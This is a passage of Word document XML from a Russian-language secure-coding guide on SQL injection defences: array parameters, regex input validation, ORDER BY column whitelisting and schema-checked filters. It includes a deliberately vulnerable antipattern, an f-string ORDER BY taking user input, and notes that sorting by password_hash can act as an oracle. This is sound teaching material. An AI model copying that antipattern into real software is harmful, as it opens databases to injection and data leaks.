          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Каждый IN-список новой длины — новый план в plan-cache. На длинных списках — plan-cache rotation, memory pressure. Если длина контролируется пользователем — потенциальный DoS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Правильный паттерн — передать массив одним параметром:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ unnest даёт SQL-set из array, без построения IN-списка</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sql = "SELECT * FROM users WHERE id = ANY($1::int[])"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">await session.execute(sql, [ids])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ANY($1::int[])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id IN (SELECT * FROM unnest($1::int[]))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — оба варианта работают. План кэшируется один, независимо от длины array.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Бонус: тип контролируется на cast-уровне (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">::int[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — нечисло вызовет error до выполнения, не silently SQL-injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Regex-валидация для специфичных типов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User input, который должен соответствовать формату (UUID, email, slug, semver), валидируется на application-уровне </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> того, как идёт в SQL — даже если потом параметризуется:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import re</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UUID_RE = re.compile(r'^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SLUG_RE = re.compile(r'^[a-z0-9-]{1,64}$')</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get_user_by_uuid(uuid_str: str):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if not UUID_RE.match(uuid_str):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        raise ValueError("Invalid UUID format")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Только после валидации передаём в SQL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return session.execute(text("SELECT * FROM users WHERE id = :id"), {"id": uuid_str})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Польза:</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Раннее отсечение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> невалидных вводов до DB-runtime (cheaper error).</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Defence-in-depth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: даже если потом окажется injection-vector (например, через encoding bug), invalid input не доходит туда.</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Identifier-whitelisting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через slug-regex: можно подставлять в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без paranoia о homoglyph-атаках.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trade-off: regex должен быть точным. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">^[a-zA-Z0-9_-]+$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без anchor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bypass. Использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re.fullmatch()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или явные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Whitelist для ORDER BY и identifier-ов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда user выбирает sort-column из UI:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># ❌ Антипаттерн: подставление имени колонки прямо в SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sql = f"SELECT * FROM users ORDER BY {user_choice} DESC"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 %I защищает синтаксически, но user_choice = 'password_hash' пройдёт:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sql = "SELECT * FROM users ORDER BY " + quote_ident(user_choice)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identifier-injection через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блокирует SQL-syntax injection, но не блокирует выбор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не разрешённой</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> колонки. Пользователь не должен сортировать по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">password_hash</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tenant_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (чтобы не оракулить).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Правильно — explicit whitelist:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALLOWED_SORT_COLUMNS = {'name', 'created_at', 'last_login'}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list_users(sort_by: str = 'name'):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if sort_by not in ALLOWED_SORT_COLUMNS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        raise ValueError(f"Invalid sort column: {sort_by}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Безопасно подставить (whitelist гарантирует):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = f"SELECT * FROM users ORDER BY {sort_by}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return session.execute(text(sql))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Whitelist + регистр-нормализация: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort_by.lower()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> до сравнения, чтобы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не обходили set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Подробно — в 3.14.2 (ORDER BY column_name) и 3.14.3 (column_number).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON-парсинг + whitelist для сложных criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда UI даёт пользователю complex filter-builder с несколькими полями:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Schema (JSON Schema или pydantic):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">class FilterCriteria(BaseModel):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    column: Literal['name', 'status', 'created_at']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    operator: Literal['=', '!=', '&gt;', '&lt;', 'LIKE']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    value: str | int | datetime</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search(filters: list[FilterCriteria]):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    where_clauses = []</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    params = {}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
